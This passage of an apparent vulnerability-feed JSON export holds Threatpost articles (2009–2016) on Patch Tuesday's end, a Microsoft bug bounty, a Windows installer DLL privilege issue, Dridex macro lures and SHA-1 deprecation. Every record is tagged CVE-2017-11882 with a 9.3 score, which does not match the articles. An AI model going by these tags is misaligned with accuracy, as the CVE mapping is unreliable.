9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:55", "description": "Scheduled patch deliveries are so last decade\u2014and thankfully, it looks like they\u2019re over when it comes to [Microsoft Patch Tuesday](<https://threatpost.com/creaking-patch-tuesdays-viability-rests-with-quality-speed/110941>).\n\nMicrosoft this week at its Ignite event introduced its new security update scheme called [Windows Update for Business](<http://blogs.windows.com/bloggingwindows/2015/05/04/announcing-windows-update-for-business/>), which debuts in Windows 10 with several new features that help IT departments take better control of patch deployments and prioritization. For consumers and businesses not running Windows Pro or Windows Enterprise devices where the service is free, the second-Tuesday-of-every-month procession of updates is over.\n\n\u201cWe\u2019re not going to be delivering all of these updates to all of these consumers on one day of the month,\u201d said Terry Myerson, executive vice president of operating systems at Microsoft.\n\nAnd with that declaration, Patch Tuesday\u2019s 12-year run is essentially done. Companies that have structured all-hands-on-deck patch rollouts will now get patches\u2014and new functionality features\u2014as they\u2019re available. Windows of exposure to attacks against unpatched vulnerabilities close a little tighter. The applause given to Myerson during his keynote at Ignite was likely echoed in server rooms worldwide.\n\nFor Windows Update for Business users, patch rollouts will look different. Distribution rings allow Windows admins to designate which machines get updates on a quicker cycle\u2014think remote offices and workers. Admins can also designate maintenance windows for certain machines, and integrate the update mechanism into existing system management tools.\n\n\u201cConsumers will want to be on one of the faster-moving tiers. They may not want to be part of the \u2018ludicrous\u2019 tier, but these users will want faster adoption of new features and user experience changes,\u201d said Chris Goettl of Shavlik, a longtime patch management firm. \u201cWith this change, businesses will actually be able to take advantage of all tiers. An IT organization with a desire to vet out new updates before they reach the bulk of their user base can put a test group on the \u2018ludicrous\u2019 tier. That way they can get a feel for the changes coming, the stability of those changes and potentially block any of those updates that have a negative effect.\u201d\n\nMicrosoft said it will offer what it\u2019s calling Long Term Servicing Branches, which offer only security updates to machines on that tier, similar to Patch Tuesday updates as currently structured.\n\n\u201cWith these changes, the power of Patch Tuesday will diminish rapidly,\u201d Goettl said.\n\nIt\u2019s no secret Microsoft has had an interesting few months with regard to patching. First there was an internal restructuring under new CEO Satya Nadella that resulted in 2,100 layoffs and the integration of the [Trustworthy Computing group](<https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) into Microsoft\u2019s enterprise and cloud computing organizations. In the subsequent months since the September 2014 shakeup, [patch quality](<https://threatpost.com/issues-arise-with-ms14-066-schannel-patch/109385>) has been an issue with a couple of important fixes pulled back, and other publicly disclosed and exploited vulnerabilities sitting unpatched for a nerve-racking period of time. And not to mention, Microsoft\u2019s decision to discontinue [Advanced Notification of patches](<https://threatpost.com/microsoft-limits-advanced-patch-notifications-to-premier-customers/110294>) on the Thursday prior to Patch Tuesday, leaving it available only to premier support customers.\n\nNow that the dust has settled in Redmond, it\u2019s clear that the plan was to give Patch Tuesday a facelift. For consumers who are indifferent about security updates, this assures a fleet of devices running at current patch levels on a timely basis. For businesses, more choice and control is always welcome.\n\n\u201cSome people want the software right after it finishes our testing,\u201d Microsoft\u2019s Myerson said. \u201cThey don\u2019t want to wait a second. Then we have people step back and say they\u2019ll wait until we work out the kinks make sure there are no compatibility issues, no functionality issues. Great, we let the user choose. With this, we have confidence that we have the highest quality patches testing them with an incredibly broad population.\u201d\n\nSlow-moving enterprises, meanwhile, are likely to stick to their current change and configuration management processes for the time being. Some companies just cannot afford the downtime and reliability issues caused by a patch breaking other applications, or updates requiring a reboot to take affect during business hours.\n\n\u201cImagine the referential integrity issues with some machines accepting patches and others not based on reboots, when services can be restarted, or even if they are offline,\u201d said Morey Haber, vice president of technology at Beyond Trust. \u201cBusinesses would no longer have a controlled baseline to measure against when patches are being streamed versus a firm bulk release by date.\u201d\n\nHowever, with the speed at which vulnerabilities are being found by white and black hats\u2014and disclosed\u2014organizations can no longer afford to sit tight for three to four weeks, or months waiting for a patch. The speed at which attacks are folded into exploit kits should give pause to any critic of automatic rollouts.\n\n\u201cLarge enterprises are always slower moving to the adoption of new concepts and risk, especially with IT. The argument for the other side is what if I could cut a third of my patching costs if I don\u2019t have to patch all the time?\u201d Andrew Storms, VP of security services at New Context, told Threatpost in February. \u201cIf I were a CIO, I would be drooling.\u201d\n\nMicrosoft would not answer questions for this article, instead provided this statement: \u201cWindows Update for Business can take responsibility for the timely distribution of security updates for customers for free. Customers that choose to distribute updates themselves will continue to receive the updates on the second Tuesday of the month.\u201d_ _\n\n_This article was updated to include a comment from Microsoft._\n", "cvss3": {}, "published": "2015-05-06T13:10:24", "type": "threatpost", "title": "Windows Update for Business Uproots Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-05-08T19:58:48", "id": "THREATPOST:580280FBECF50DF8FF68F3A998F311D3", "href": "https://threatpost.com/patch-tuesday-facelift-end-of-an-era/112640/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:48", "description": "** \n**\n\nDatabase Management Systems (DBMS) have extended their capabilities far beyond simply serving as data storage and query systems. Contrary to what they were in the 1970\n", "cvss3": {}, "published": "2010-10-18T19:49:08", "type": "threatpost", "title": "How to Minimize Your Database Attack Surface", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:19:32", "id": "THREATPOST:334259E5C4B157E6AC8ADC754BD30D4F", "href": "https://threatpost.com/how-to-minimize-your-database-attack-surface/74583/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:06", "description": "Microsoft had always rejected the possibility of a [full-scale bug bounty](<http://threatpost.com/microsofts-bug-bounty-program-and-the-law-of-unintended-consequences/101038>), relying instead on solid relationships it spent the better part of a decade fostering with researchers worldwide who submit vulnerabilities to the Microsoft Security Research Center (MSRC).\n\nYet in the past couple of years, the company has bent a bit in the other direction, instituting reward programs for researchers who develop new bypasses for exploit mitigations, or defensive techniques that can be folded into Microsoft products.\n\nThe company has already paid out several hundred thousands of dollars to researchers who have successfully [beaten exploit mitigations in Windows](<https://threatpost.com/microsoft-launches-100000-bug-bounty-program/101015>), including ASLR, DEP, SEHOP and more, as well as rewarding one researcher $200,000 for a new technique to [defend against return-oriented programming (ROP) attacks](<https://threatpost.com/vasillis-pappas-wins-200000-microsoft-blue-hat-prize-072712>).\n\nIndividual vulnerability payouts have been off the board for the most part (Microsoft did institute a [temporary bounty for Internet Explorer 11](<http://threatpost.com/researchers-nab-28k-in-microsoft-bug-bounty-program/102535>) in the summer of 2013), until today when Microsoft launched the [Microsoft Online Services Bug Bounty Program](<http://technet.microsoft.com/en-us/security/dn800983>). Bounties start at $500,and vulnerabilities in cloud-based services such as Office 365 are the first eligible in the program, Microsoft said.\n\n\u201cGenerally, bounties will be paid for significant web application vulnerabilities found in eligible online service domains,\u201d Microsoft said in a statement announcing the program, adding that researchers must also submit concise steps that will allow Microsoft engineers to reproduce the vulnerability.\n\nOnly certain domains are eligible, Microsoft said. That list includes:\n\n * portal.office.com\n * *.outlook.com (Office 365 for business email services applications, excluding any consumer \u201coutlook.com\u201d services)\n * outlook.office365.com\n * login.microsoftonline.com\n * *.sharepoint.com\n * *.lync.com\n * *.officeapps.live.com\n * www.yammer.com\n * api.yammer.com\n * adminwebservice.microsoftonline.com\n * provisioningapi.microsoftonline.com\n * graph.windows.net\n\nOnly certain vulnerability classes are eligible as well, including cross-site scripting, cross-site request forgery, insecure direct object references, injection and authentication flaws, server-side code execution, privilege escalation, security configuration issues and cross-tenant data tampering or access eligible in multitenant services, Microsoft said.\n\n\u201cThe aim of the bug bounty is to uncover significant vulnerabilities that have a direct and demonstrable impact to the security of our users and our users\u2019 data,\u201d Microsoft said.\n\nMicrosoft also listed a number of vulnerabilities that are ineligible; those include:\n\n * Missing HTTP Security Headers (such as X-FRAME-OPTIONS) or cookie security flags (such as \u201chttponly\u201d)\n * Server-side information disclosure such as IPs, server names and most stack traces\n * Bugs in the web application that only affect unsupported browsers and plugins\n * Bugs used to enumerate or confirm the existence of users or tenants\n * Bugs requiring unlikely user actions\n * URL Redirects (unless combined with another flaw to produce a more severe vulnerability)\n * Vulnerabilities in platform technologies that are not unique to the online services in question (Apache or IIS vulnerabilities, for example.)\n * \u201cCross Site Scripting\u201d bugs in SharePoint that require \u201cDesigner\u201d or higher privileges in the target\u2019s tenant.\n * Low impact CSRF bugs (such as logoff)\n * Denial of Service issues\n * Cookie replay vulnerabilities\n\nMicrosoft also made it clear that it wants researchers to shy away from denial-of-service testing or any type of automated testing of its services that could lead to significant traffic sent their way. Researchers are also discouraged from trying to access data belonging to someone else consuming a cloud service or expanding a test to include social engineering or phishing against Microsoft employees.\n\nMicrosoft said complete submissions can be sent to [secure@microsoft.com](<mailto:secure@microsoft.com>).\n", "cvss3": {}, "published": "2014-09-23T15:52:05", "type": "threatpost", "title": "Microsoft Online Services Bug Bounty Program Launches", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-23T19:52:05", "id": "THREATPOST:222B126A673B8B22370D386B699A7F90", "href": "https://threatpost.com/microsoft-starts-online-services-bug-bounty/108486/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:58", "description": "There\u2019s an odd bit of behavior that some Windows systems will exhibit when certain kinds of installers are launched, automatically elevating the privileges of the installer process to system-level privileges. In theory, the issue shouldn\u2019t be exploitable because at one point in the process the system will generate an MD5 hash of a DLL that\u2019s to be loaded, and unless the attacker can replace that DLL with a malicious one that sports the same hash, an attack is impossible. But those constraints may not hold for all attackers, a researcher says.\n\nThe weirdness in Windows 7 and Windows Server 2008 was identified by Cesar Cerrudo of IOActive, and he spent some time looking into exactly what causes it and whether he\u2019d be able to exploit the condition. The issue arises when an installer for a program that is already installed on a given machine is executed. When one of those installers is run, it will automatically elevate the privileges of the current installer process to the System level. That would theoretically give an attacker a local elevation of privilege bug, granting him system privileges.\n\n\u201cHowever, an interesting issue arises during the installation process when running this kind of installer: a temporary file is created in `C:UsersusernameAppDataLocalTemp`, which is the temporary folder for the current user. The created file is named `Hx????.tmp `(where `????` seem to be random hex numbers), and it seems to be a COM DLL from Microsoft Help Data Services Module, in which its original name is `HXDS.dll`. This DLL is later loaded by `msiexec.exe` process running under the System account that is launched by the Windows installer service during the installation process,\u201d [Cerrudo wrote in a blog post](<http://blog.ioactive.com/2012/01/free-windows-vulnerability-for-nsa.html?m=1>) explaining the issue.\n\n\u201cWhen the DLL file is loaded, the code in the DLL file runs as the System user with full privileges. At first sight this seems to be an elevation of privileges vulnerability since the folder where the DLL file is created is controlled by the current user, and the DLL is then loaded and run under the System account, meaning any user could run code as the System user by replacing the DLL file with a specially-crafted one before the DLL is loaded and executed.\u201d\n\nBut there\u2019s more to it than just that. In order to exploit the weakness, Cerrudo said that an attacker likely would need to create a malicious DLL with the same MD5 hash as the benign one and then replace the original one with the DLL containing the exploit code. The attack in this case would be against the MD5 algorithm itself, because the attacker would need to create a second message with the same hash as the known message. Known as a second preimage attack, it is practically out of reach for most individual attackers.\n\nHowever, Cerrudo says that it may well be possible for an organization such as an intelligence agency that has massive amounts of compute power and resources to be able to execute such an attack. MD5 is known to have a variety of weaknesses, including collision problems, and Microsoft itself stopped including it in its products seven years ago. Cerrudo said that while exploiting the issue he found via a second preimage attack is likely impractical for most attackers, there may be other vectors out there that could accomplish the same task.\n\n\u201cI think that there could be others. I dedicated some time to it, I did research and tried different ways to exploit the issue but this doesn\u2019t mean that I exhausted all possibilities. It\u2019s just a matter of dedicating some time and trying different options like combining this issue with others, abusing some Windows Installer functionality, timing and blocking issues, etc. These are the kind of things I would try if I would have time. I wouldn\u2019t discard that someone can come up with an idea to exploit it,\u201d Cerrudo said via email.\n", "cvss3": {}, "published": "2012-01-18T15:20:13", "type": "threatpost", "title": "Elevating Privileges Via Windows Installers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:58", "id": "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "href": "https://threatpost.com/elevating-privileges-windows-installers-011812/76111/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:29", "description": "One of the patches released by Microsoft last week is not providing protection against the vulnerability it was meant to fix, according to a researcher who today accused Microsoft of making functionality a higher priority than security.\n\nAccording to Tyler Reguly, a senior security engineer at nCircle Network Security Inc., last Tuesday\u2019s MS09-008 update does not fix the problem for all users, many of whom may not realize that they\u2019re still vulnerable to attack. \u201cWhen you get a patch from a vendor, you expect it to provide some level of security,\u201d said Reguly. \u201cBut MS09-008 only mitigates the problem, it doesn\u2019t patch it.\u201d\n\nRead [the full story](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9129722&source=rss_topic17>) [computerworld.com]. \n\nAlso see [nCircle\u2019s original advisory](<http://blog.ncircle.com/blogs/vert/archives/2009/03/successful_exploit_renders_mic.html>) [ncircle.com] and the [reaction from Microsoft\u2019s security response](<http://blogs.technet.com/srd/archive/2009/03/13/ms09-008-dns-and-wins-server-security-update-in-more-detail.aspx>) [technet.com] team.\n", "cvss3": {}, "published": "2009-03-17T14:19:18", "type": "threatpost", "title": "Microsoft spars with researcher over security patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:34", "id": "THREATPOST:4AFBF9284A6902E941BE6D95BCD2052E", "href": "https://threatpost.com/microsoft-spars-researcher-over-security-patch-031709/72423/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:15", "description": "Not long ago, criminals pushing the Dridex banking Trojan were using [Microsoft Excel documents spiked with a malicious macro](<http://threatpost.com/dridex-banking-trojan-spreading-via-office-macros/110255>) as a phishing lure to entice victims to load the malware onto their machines.\n\nEven though macros are disabled by default inside most organizations, the persistent hackers are still at it, this time using XML files as a lure.\n\nResearchers at Trustwave today said that over the past few days, several hundred messages have been corralled that are trying to exploit users\u2019 trust in Office documents with some clever social engineering thrown into the mix in an attempt to convince users to enable macros and thus download the banking malware onto their machines.\n\nThe XML files are passed off as \u201cremittance advice,\u201d or payment notifications, with the hopes that some users will believe it\u2019s an innocent text file and execute the malicious code.\n\n\u201cXML files are the old binary format for Office docs and once you double click them to open, the file associated with Microsoft Word and opens,\u201d said Karl Sigler, Trustwave threat intelligence manager. The malicious macro is compressed and Base64 encoded in order to slide through detection technology, Sigler said, adding that the attackers have also included a pop-up with instructions for the user on how to enable macros with language that stresses macros must be enabled for the invoice to viewed properly or to ensure proper security. \u201cWhich is the exact opposite of what this does,\u201d Sigler said. \u201cIt doesn\u2019t seem to be all that sophisticated. They\u2019re either trying to capitalize on a user\u2019s trust in XML files, or the fact that a user may not be that familiar with what that extension is.\u201d\n\nIf the user does follow through and execute the malware, Dridex behaves like most banking Trojans. It sits waiting for a user to visiting an online banking site and then injects code onto the bank site in order to capture the user\u2019s credentials for their online account.\n\nSigler said this is the first time they\u2019ve spotted XML docs used as a lure. As for macros, they\u2019ve been disabled by default since Office 2007 was released.\n\n\u201cSometimes in large organizations, local administrators have the ability to enable macros,\u201d Sigler said. \u201cSome organizations use them quite a bit, but it\u2019s not common. Most people leave the default settings. It\u2019s hard to say why these guys moved to XML. It could be that they\u2019re looking for a new attack vector and they weren\u2019t getting good click-through rates with the Excel documents. Maybe they were not getting people to enable macros the way they hoped and they\u2019re looking for a way to better their success rate.\u201d\n\nDridex is a descendent of Cridex and is in the GameOver Zeus family. GameOver Zeus has been used for years to great profit, particularly through wire fraud. It used a peer-to-peer architecture to spread and send stolen goods, opting to forgo a centralized command-and-control. P2P and domain generation algorithm techniques make botnet takedowns difficult and extend the lifespan of such malware schemes. The previous Dridex campaign targeted U.K. banking customers with spam messages spoofing popular companies either based or active in the U.K. Separate spam spikes using macros started in October and continued right through mid-December; messages contained malicious attachments claiming to be invoices from a number of sources, including shipping companies, retailers, software companies, financial institutions and others.\n", "cvss3": {}, "published": "2015-03-06T13:38:40", "type": "threatpost", "title": "Dridex Banking Trojan Spreading Via Macros in XML Files", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-03-10T11:23:01", "id": "THREATPOST:DD7A2F272ACFDE71B0A0CEC234C35876", "href": "https://threatpost.com/dridex-banking-trojan-spreading-via-macros-in-xml-files/111503/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:07", "description": "[](<https://threatpost.com/latest-ms-patches-causing-black-screen-death-113009/>)The IDG News Service is reporting that Microsoft\u2019s latest round of security patches appears to be causing some PCs to seize up and display a black screen, rendering the computer useless. The problem affects Microsoft products including Windows 7, Vista and XP operating systems. \nFrom the article: \n\nMicrosoft apparently made changes to the Access Control List (ACL), a list of permissions for a logged-on user. The ACL interacts with registry keys, creating visible desktop features such as a sidebar. \n\nHowever, the latest patches appear to make some changes to those \nregistry keys. The effect is that some installed applications aren\u2019t \naware of the changes and don\u2019t run properly, causing a black screen.\n\n[Read the full story](<http://www.computerworld.com/s/article/9141568/Latest_Microsoft_patches_cause_black_screen_of_death?source=rss_security>) [computerworld.com]\n", "cvss3": {}, "published": "2009-11-30T15:38:43", "type": "threatpost", "title": "Latest MS Patches Causing Black Screen of Death", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:03:25", "id": "THREATPOST:7D30EC4B25275AFBC409D8619D125E65", "href": "https://threatpost.com/latest-ms-patches-causing-black-screen-death-113009/73168/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:12", "description": "A [suspicious Windows 7 update](<https://answers.microsoft.com/en-us/windows/forum/windows_7-update/windows-7-update-appears-to-be-compromised/e96a0834-a9e9-4f03-a187-bef8ee62725e?auth=1>) today raised concern on a number of Microsoft and technology forums that the Windows Update service had been compromised. Microsoft, however, cleared the air several hours later admitting that the update was their mistake.\n\n\u201cWe incorrectly published a test update and are in the process of removing it,\u201d said a Microsoft spokesperson\n\nA compromise of such an automated update service would have had devastating results. Automated software update services have long been speculated as a means to spread malware at scale. Attackers or governments that infiltrate something like Windows Update could compromise software updates to the point where such services are no longer trusted, leaving endpoints and servers unpatched and at greater risk.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2015/09/07002408/accidental-windows-update.jpeg>)\n\nRated important, the mysterious update, purportedly a new language pack, showed up early this morning on home and business users\u2019 machines. The update was 4.3 MB in size and included long, random character file names and redirects to different .mil, .gov and .edu domains\u2014both of which were out of the norm for Windows updates.\n\nThe update has since disappeared from Windows Update, but not before it was pushed mostly to consumers via Windows Update. Some users said the update to install on their machines. Others who successfully installed the update essentially bricked their machines, according to replies on the original Windows 7 forum post.\n\nWindows Update and Windows Server Update Services (WSUS) are especially juicy targets. At Black Hat this summer, researchers Paul Stone and Alex Chapman of Context Information Security of the U.K. demonstrated [weaknesses in WSUS](<https://threatpost.com/manipulating-wsus-to-own-enterprises/114168/>) that are difficult to address and expose any server or desktop using its automated updates to compromise.\n\nJust last week, the _[Washington Post](<https://www.washingtonpost.com/world/national-security/obama-administration-ponders-how-to-seek-access-to-encrypted-data/2015/09/23/107a811c-5b22-11e5-b38e-06883aacba64_story.html>) _reported that the U.S. government explored several approaches that technology providers could implement to cure the [Going Dark crypto issue](<https://threatpost.com/feasible-going-dark-crypto-solution-nowhere-to-be-found/114150/>). Law enforcement and government officials have expressed concern over recent changes from Apple and Google, in particular, to divorce themselves from storing encryption keys. The practice, government says, hinders law enforcement and national security investigations. They suggest, according to the _Post _article, that under a court order, the government could drop spyware on machines via software update services.\n\nAt TrustyCon, a 2014 event adjunct to RSA Conference, ACLU principal technologist Chris Soghoian delivered a talk that also suggested the next wave of [surveillance efforts could target update services](<https://threatpost.com/are-automated-update-services-the-next-surveillance-frontier/104558/>).\n\nSoghoian said his concern is that the government will not only exploit the convenience of these update services offered by most large providers, but also that it will erode the trust users have in the services leaving them vulnerable to cybercrime, identity theft and fraud.\n\n\u201cThere are really sound security reasons why we want automatic security updates. If consumers have to do work to get updates, they won\u2019t, and they will stay vulnerable,\u201d Soghoian said in 2014. \u201cWhat that means though is giving companies root on our computers\u2014and we really don\u2019t know what\u2019s in the code after fact. This is a point of leverage the government can use. We have no evidence they are using it right now, but these companies have a position of power over our devices that is unparalleled.\u201d\n", "cvss3": {}, "published": "2015-09-30T15:22:01", "type": "threatpost", "title": "Mystery Windows 7 Update An Accidental Test Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-02T16:00:39", "id": "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "href": "https://threatpost.com/suspicious-windows-7-update-actually-an-accidental-microsoft-test-update/114860/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:48", "description": "TENERIFE, Spain \u2013 Network defenders who rely solely on lists of assets to protect are running a fool\u2019s errand.\n\nInstead, it\u2019s crucial to think in graphs to not only visualize threats, but also to understand network edges, and dependencies between assets and accounts in order to be able to capture attacker activities and render them useless.\n\nJohn Lambert, general manager of Microsoft\u2019s Threat Intelligence Center, said in today\u2019s keynote address at the Kaspersky Lab Security Analyst Summit that while successful defenders may understand the basic security principles of confidentiality, integrity and availability, they\u2019re interpreting each point on the triad in radically new ways.\n\n\u201cThey\u2019re discarding stuff that doesn\u2019t work,\u201d Lambert said. \u201cAnd stuff they don\u2019t have, they\u2019re inventing it.\u201d\n\nLambert recalled a time not so long ago when defenders were too protective of their intelligence. It was crucial to understand the assets in their environments, develop incident response plans, and view penetration test results as a report card on their internal security\u2014an output. Intelligence was rarely shared; for example, analysts weren\u2019t sent to security conferences for fear of \u201cblabbing\u201d threat indicators that might give away a competitive advantage.\n\nModern defenders cannot afford to think that way, Lambert said. One graph he demonstrated showed a graph of dependencies between network edges, accounts, permissions that spread across the screen like bacteria in a petri dish.\n\n\u201cModern defenders, they have a graph of things to protect,\u201d Lambert said. \u201cThey think about adversaries and their next move. They find trusted peers in the community, and understand the importance of learning from others and their practices. Pen-tests are diagnostics to successful defenders, not a report card. Pen-tests are input, with a goal of increasing attacker requirements.\u201d\n\nLambert shared examples of changes Microsoft has made to core security and detection processes that have eventually made their way into patches and updates that have eliminated scores of zero-days.\n\n\u201cWe are in a world where modern defenders are sharing about adversaries across geographies, industries and even within lines of competition,\u201d Lambert said. \u201cThreats are common thing we all face. There\u2019s no magical information-sharing thing. It\u2019s a trust-based thing. You have to get to know people, you\u2019re not trading with a vendor, you\u2019re sharing with a person. It\u2019s not a transactional relationship. You want to give them indicators because you want them to find more out there and it will help you down the line.\u201d\n\nThe goal should be not only to get attackers off your network and imprison hacker activity, but also to raise the cost of exploit development for attackers.\n\n\u201cYou want to force adversaries to go back to development,\u201d Lambert said, adding that cooperation, even among professional competitors, leads to important research being published, which could awaken others to lend a fresh set of eyes to the problem.\n\n\u201cThe goal should be to remove all of us from a world of information siloes and not sharing, to a world where hacker activity is imprisoned and all their opsec mistakes are trapped and can\u2019t be used anymore,\u201d Lambert said. \u201cKnowledge of intrusion sets grows and grows. This just serves to improve adversary coverage and helps everyone.\u201d\n", "cvss3": {}, "published": "2016-02-08T08:05:53", "type": "threatpost", "title": "Modern Defenders Share, Visualize and Succeed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-02-17T16:28:47", "id": "THREATPOST:1BC8168472B040DAEF3D3D5CCC865068", "href": "https://threatpost.com/modern-defenders-share-visualize-and-succeed/116181/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:58", "description": "LAS VEGAS \u2014 It wasn\u2019t long ago that ROP, or return-oriented programming, was a hacker\u2019s best friend when it came to bypassing mitigations against memory-based attacks such as DEP and ASLR.\n\nROP, however, is so 2005. In the last couple of years, researchers and attackers have figured out how to bypass popular tools such as Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET), without the need for ROP. Exploit kits, for example have integrated attacks that have moved up the exploitation stack closer to memory and before code is written to disk. All the while, defenders still focus on post-exploitation techniques (i.e., ROP) that are obsolete today.\n\nThis week at Black Hat USA 2016 in Las Vegas, researchers at Endgame are expected to introduce new defensive techniques that could level the playing field. Their approach is called Hardware Assisted Control Flow Integrity (HA-CFI), which leverages features in the micro-architecture of Intel processors, such as the performance monitoring unit (PMU), for security.\n\n\u201cDuring the last two years, academics have been using it for security purposes,\u201d said Cody Pierce, Endgame director of vulnerability research. \u201cWe\u2019re continuing the idea of using hardware features to implement a security check. That\u2019s where CFI comes in and monitors the PMU to get real-time views into protected processes.\u201d\n\nWhere tools such as EMET catch attacks in the post-exploitation stage of an attack, HA-CFI operates in the exploitation stage before bypasses happen.\n\n\u201cIt\u2019s generic in the fact it has no knowledge of exploit techniques, and doesn\u2019t know about ROP; the system is autonomous,\u201d Pierce said. \u201cWhat it\u2019s looking for is an abnormal change in execution. Usually this is the absolute first step of exploits. They will redirect execution from normal- to attacker-controlled execution. That\u2019s a very specific thing that we\u2019re hoping to pick up on.\n\n\u201cAn analogy to malware would be that you would want to pick up detection of malware before it\u2019s written to disk,\u201d Pierce said. \u201cYou don\u2019t want to wait until it runs and sets up persistence and backdoors.\u201d\n\nMicrosoft implemented [Control Flow Guard](<https://msdn.microsoft.com/en-us/library/windows/desktop/mt637065\\(v=vs.85\\).aspx>) starting with Visual Studio 2015 and it runs only on x86 and x64 releases on Windows 8.1 and Windows 10. CFG restricts where applications can execute code from, Microsoft said, cutting into the effectiveness of code execution attacks and buffer overflow exploits. Pierce said CFG has its limitations, specifically that can run only on the latest compilers and OSes, requiring organizations to recompile in order to run it. HA-CFI would operate at runtime, and its biggest limitation, Pierce said, is a performance overhead that could be 3x higher than Microsoft\u2019s requiring organizations to consider that tradeoff when protecting commonly exploited apps such as browsers, Office and Flash.\n\nAs for ROP being on life support, a number of prominent researchers have been developing new approaches to mitigation bypasses that are putting those attacks out to pasture. [Yang Yu](<https://threatpost.com/latest-microsoft-100000-bounty-winner-bypasses-aslr-dep-mitigations/104328/>), a two-time [Microsoft bounty winner](<https://threatpost.com/patched-badtunnel-windows-bug-has-extensive-impact/118697/>), really got the ball rolling with a 2014 Black Hat talk called [Write Once, Pwn Anywhere](<https://www.blackhat.com/docs/us-14/materials/us-14-Yu-Write-Once-Pwn-Anywhere.pdf>) where he was able to change a value in memory that allowed his attack to bypass native restrictions and execute commands sans ROP. The Hacking Team dump of last summer also showed that other professionals had [moved beyond ROP](<https://threatpost.com/curious-tale-of-a-microsoft-silverlight-zero-day/115873/>) with a slate of attacks that [bypass EMET](<https://threatpost.com/bypass-developed-for-microsoft-memory-protection-control-flow-guard/114768/>) and other mitigations.\n\n\u201cFrom an exploit writer\u2019s perspective, you don\u2019t want to have to do more work than necessary, and we\u2019ve learned ROP is a little unnecessary,\u201d Pierce said, adding that some of these techniques that have become public in the last 12-18 months have made it easier to develop more powerful exploits.\n\n\u201cWith ROP, usually some work has to be done to get all versions of apps you want to exploit,\u201d Pierce said. \u201cThese advanced approaches eliminate that need.\u201d\n", "cvss3": {}, "published": "2016-08-01T13:00:22", "type": "threatpost", "title": "HA-CFI Technique Checks Mitigation Bypasses Earlier", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-07-29T19:00:17", "id": "THREATPOST:519EDC580FCA347C035738F51DB2ABE3", "href": "https://threatpost.com/new-technique-checks-mitigation-bypasses-earlier/119568/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:00", "description": "One by one, tech companies have [been tossing aside the SHA-1 cryptographic algorithm](<http://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902>) like the unreliable collision-prone mess that it is.\n\nMicrosoft was among the first to steer its customers away from SHA-1 and established an internal edict that its developers would no longer use it for code-signing or its certificates after January 2016.\n\nYesterday among the flurry of its [Patch Tuesday security bulletins](<http://threatpost.com/fixes-for-ie-flash-player-in-october-patch-tuesday-release/108838>), Microsoft took another important step when it issued a pair of security advisories, one notifying users that it had made the [SHA-2 algorithm available for Windows 7 and Windows Server 2008 R2](<https://technet.microsoft.com/en-us/library/security/2949927>). The other was an update for Microsoft EAP implementations that [enables the use of Transport Layer Security (TLS) 1.1 or 1.2](<https://technet.microsoft.com/en-us/library/security/2977292>).\n\nSHA-1 collisions have been theoretically possible for years; collisions occur when an attacker is able to generate a certificate with the same signature as the original cert. Though mathematically possible, a collision attack, even against a weakened SHA-1, would take significant hardware resources in order to execute.\n\nThat gap, however, is narrowing. In 2012, Bruce Schneier published research in which he concluded that [collisions would be within reach of most hackers by 